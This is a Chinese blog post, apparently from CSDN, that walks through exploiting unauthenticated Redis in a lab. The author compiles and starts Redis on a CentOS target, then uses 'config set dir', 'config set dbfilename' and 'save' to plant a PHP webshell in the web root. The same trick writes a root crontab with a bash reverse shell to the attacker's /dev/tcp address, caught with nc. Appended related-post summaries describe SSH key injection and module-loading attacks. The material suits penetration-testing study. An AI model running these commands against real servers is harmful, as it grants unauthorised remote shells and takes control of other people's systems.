Redi未授权访问的两种利用方式

已于 2024-03-08 14:59:21 修改
阅读量312 收藏
点赞数
文章标签: web安全 安全 网络 网络安全
于 2023-09-12 17:21:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_69775412/article/details/132836870
版权

前言:redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用相关的策略,比如添加防火墙规则避免其他非信任来源ip访问等,这样将会将Redis服务暴露在公网上,如果在没有设置密码认证的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。攻击者在未授权访问Redis的情况下,利用Redis自身提供的config命令,可以进行写文件操作,攻击者可以成功将自己的ssh公钥写入目标服务器的/root/.ssh/authotrized_keys文件中,进而可以使用对应私钥直接使用ssh服务登录目标服务器

0x00 环境配置

1. kali(攻击机)       IP:192.168.2.100
2. Centos 7.9(靶机)      IP:192.168.2.120

0x01 搭建服务

#将windows本机提前下载好的redis压缩包传输到 Centos 7.9家目录下
scp redis-5.0.3.tar.gz root@192.168.2.120:/root/

#Centos上操作
[root@M1key ~]#yum -y install tar        //安装tar命令用于解压文件
[root@M1key ~]# tar -zxf redis-5.0.3.tar.gz  //解压缩redis文件
[root@M1key ~]# cd redis-5.0.3
[root@M1key redis-5.0.3]# yum -y install centos-release-scl //安装软件集合包
[root@M1key redis-5.0.3]# yum -y install devtoolset-9-gcc devtoolset-9-gcc-c++devtoolset-9-binutils  //安装gcc
[root@M1key redis-5.0.3]# scl enable devtoolset-9 bash  //临时修改gcc版本
[root@M1key redis-5.0.3]# gcc -v    //查看gcc版本
Using built-in specs.
COLLECT_GCC=gcc
COLLECT_LTO_WRAPPER=/opt/rh/devtoolset-9/root/usr/libexec/gcc/x86_64-redhat-linux/9/lto-wrapper
Target: x86_64-redhat-linux
Configured with: ../configure --enable-bootstrap --enable-languages=c,c++,fortran,lto --prefix=/opt/rh/devtoolset-9/root/usr --mandir=/opt/rh/devtoolset-9/root/usr/share/man --infodir=/opt/rh/devtoolset-9/root/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-shared --enable-threads=posix --enable-checking=release --enable-multilib --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --with-gcc-major-version-only --with-linker-hash-style=gnu --with-default-libstdcxx-abi=gcc4-compatible --enable-plugin --enable-initfini-array --with-isl=/builddir/build/BUILD/gcc-9.3.1-20200408/obj-x86_64-redhat-linux/isl-install --disable-libmpx --enable-gnu-indirect-function --with-tune=generic --with-arch_32=x86-64 --build=x86_64-redhat-linux
Thread model: posix
gcc version 9.3.1 20200408 (Red Hat 9.3.1-2) (GCC) 
[root@M1key redis-5.0.3]#make  //make编译,编译成功后会在src目录下生成两个可执行文件redis-server、redis-cli。

注意事项:gcc版本小于5.3编译的时候会报错

启动服务
[root@M1key redis-5.0.3]# cd src/
[root@M1key src]# ./redis-server

尝试连接redis服务器
#kali操作机
root@kali:~# apt install redis-tools   //安装redis客户端
root@kali:~# redis-cli -h  192.168.2.120  //连接redis客户端,默认端口6379

可以看到会报错,因为redis默认开启哨兵模式,我们需要在开启redis服务的时候关闭哨兵模式。

[root@M1key src]# ./redis-server  --protected-mode no

再次连接就不会报错了

此时环境就准备好了,可以开始我们后续的步骤了。

0x02 写shell文件

tips:由于是上帝视角我们知道网站根目录在/var/www/html下。

192.168.2.120:6379> config set dir /var/www/html   #选网站根目录
OK
192.168.2.120:6379> config set dbfilename shell.php  #设定文件名
OK
192.168.2.120:6379> set x "\n\n<?php phpinfo();?>\n\n"  #设置文件内容
OK
192.168.2.120:6379> save     #保存
OK

tips:在写文件内容的时候,redis有可能会在开头或者末尾添加一些banner信息,所以在设置文件内容的时候我们要进行一个换行的操作。

访问我们上传的文件:

上传成功!

0x03 反弹shell

与写shell的原理一样,只不过我们这次写的文件在定时任务的目录下,设置时间触发一个定时任务,然后kali接收shell。Over~!

#kali操作机
192.168.2.120:6379> config set dir /var/spool/cron  # 选择定时任务的目录
OK
192.168.2.120:6379> config set dbfilename root     # 配置文件名称
OK
192.168.2.120:6379> set x "\n\n0-59 * * * * /bin/bash -i >&/dev/tcp/192.168.2.100/8888 0>&1\n\n"      # 配置文件内容
OK
192.168.2.120:6379> save
OK
# kali 另外开一个终端
root@kali:~# nc -lvnp 8888
listening on [any] 8888 ...
connect to [192.168.2.100] from (UNKNOWN) [192.168.2.120] 43652
bash: no job control in this shell
[root@M1key ~]#

成功接收shell。

阿一网络安全
关注
redis授权访问getshell
Jiajiajiang_的博客
08-02 5565
参考:https://blog.csdn.net/guxiaoguo/article/details/78913245 利用条件:linux,对方开启ssh 用到的工具:kali nmap redis 公司测试服务器:10.0.3.45 redis默认端口:6379 主要思路:利用redis授权访问命令给root账户写入SSH公钥文件,然后通过SSH登录服务器 ...
redis授权访问利用方式
Redredredfish的博客
08-23 1545
redis授权访问利用方式 漏洞原理: Redis<3.2默认情况下,会绑定在0.0.0.0:6379,如果没有进行采用相关的安全策略,比如添加防火墙黑白名单等等,这样会将Redis服务暴露在公网上。 如果在没有设置密码(默认为空)的情况下,会导致任意用户可以授权访问Redis以及Redis的数据。攻击者利用Redis自身的提供的config命令,可以进行写文件操作,还可以将ssh公钥写入目标服务器./root/.ssh下的authotrized_keys 文件中,进而可以利用对应私钥直接使
redis授权漏洞利用总结
最新发布
Echo__h的博客
09-09 894
redis默认端口6379,在默认配置情况下密码为空,因此如果将redis暴露到公网,会导致任意用户在可以访问目标服务器的情况下授权访问 Redis 以及Redis 的数据,并且可以利用redis写入shell、写入SSH公钥等危险操作。
Redis授权利用方式总结
hot_milk1的博客
08-07 786
目前的大多数网站搭建的Redis 均采用 docker 一键部署的方式,而 docker 镜像中的 redis 默认不是以 root 权限运行的,也就是说即使拿下这台 redis,我们也只能在对方服务器的本地内网中漫游,当然还是会有部分 redis 部署在服务器中。
Redis授权最全利用方式
swordheart的博客
01-10 2583
0x00 利用计划任务反弹shell 靶机地址:192.168.230.142 kail地址:192.168.230.128 启动靶机redis docker环境
Redis授权访问漏洞利用总结
热门推荐
Fly_鹏程万里
07-06 2万+
0x01 redis介绍Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivotal赞助。Redis因配置不当可以授权访问。攻击者无需认证访问到内部数据,可导致敏感信息泄露,也可以恶意执行flusha...
关于Redis授权访问漏洞利用的介绍与修复建议
09-09
Redis提供了两种主要的持久化方式: 1. **Snapshot(快照)**:在一定时间间隔或写操作达到一定数量后,Redis会生成当前数据集的快照,保存到磁盘。这种方式简单快速,但无法保证数据的完全一致性。 2. **AOF...
Redis授权漏洞复现及利用(window,linux)
dreamthe的博客
03-22 2万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
渗透测试-Redis授权访问漏洞利用
cdyunaq的博客
12-24 1189
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
Redis授权访问漏洞利用及防护措施(非常详细)
7Riven's blog
11-29 1万+
靶机(centos6.6):192.168.109.150 攻击机(kali-linux 2019.3):192.168.109.148 漏洞环境配置部署见:https://blog.csdn.net/qq_41210745/article/details/103305262 1.nmap存活主机扫描 2.发现疑似目标主机,扫描端口服务:找到目标端口6379 3.ka...
Redis授权访问漏洞
m0_61506558的博客
09-10 887
VNC是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件,由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于UNXI和Linux的免费开源软件,由VNC Server和VNC View两部分组成。VNC默认端口号为5900、5901。VNC授权访问漏洞如果被利用可能造成恶意用户直接控制target主机。
Redis授权访问的三种利用方式
鸣蜩十四的博客
12-01 8529
简介 Redis是一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库,并提供多种语言的API。 漏洞描述 Redis默认情况下会绑定在0.0.0.0:6379,如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下授权访问Redis以及Redis的数据。攻击者在授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys文件中,进而可以直接登录目标服务
Redis授权四种利用方式与修复方案
qq_45234543的博客
11-08 5397
想整理一波Redis利用方式,在内网中很容易遇见(方便运维人员) 简介:redis是一个key-value存储系统,nosql - 非关系型数据库,支持存储的value类型相对更多,包括string、list、set、zset和hash。这些数据类型都支持push/pop、add/remove及交并差和更丰富的操作,且操作都是原子性。为了保证效率,数据都是缓存在内存中,区别是redis会周期性的把更新的数据写入磁盘或者把修改写入追加的记录文件,并在这个基础上实现了master-slave(主从)同步
redis授权访问利用汇总
今天是几号的博客
03-17 1261
原理就是在数据库中插入一条数据,将本机的公钥作为value,key值随意,然后通过修改数据库的默认路径为/root/.ssh和默认的缓冲文件authorized.keys,把缓冲的数据保存在文件里,这样就可以在服务器端的/root/.ssh下生成一个授权的key。/var/spool/cron/ 这个目录下存放的是每个用户包括root的crontab任务,每个任务以创建者的名字命名,比如tom建的crontab任务对应的文件就是/var/spool/cron/tom。
redis授权漏洞的利用
m0_63615772的博客
04-29 1506
利用这个漏洞我们一般会去实现写入webshell、写入ssh公钥、在crontab里写定时任务,反弹shell这三种,我们依次来实现。攻击机:192.168.112.1(window10)靶机 :192.168.112.188(centos7)
Redis授权漏洞利用
tangshuangsss的专栏
01-04 643
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,...
redis授权访问漏洞(三种方法)
网安小白的博客
08-30 5846
redis授权访问复现,含写入webshell、linux计划任务反弹shell、写入ssh公钥实现ssh登录三种方法~
Redis授权访问
npc88888的博客
05-09 2029
在 Reids 4.x 之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实 现一个新的Redis命令,通过c语言编译并加载恶意.so文件,达到代码执行的目的。更改目标服务器Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):config set dir /root/.ssh。原文链接:https://blog.csdn.net/weixin_45605352/article/details/118790775。进入/root/.ssh目录: 将生成的公钥保存到。
Redis授权访问利用
LiuSiXian的博客
07-14 743
Redis服务器:192.168.100.10攻击机:192.168.15.101。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值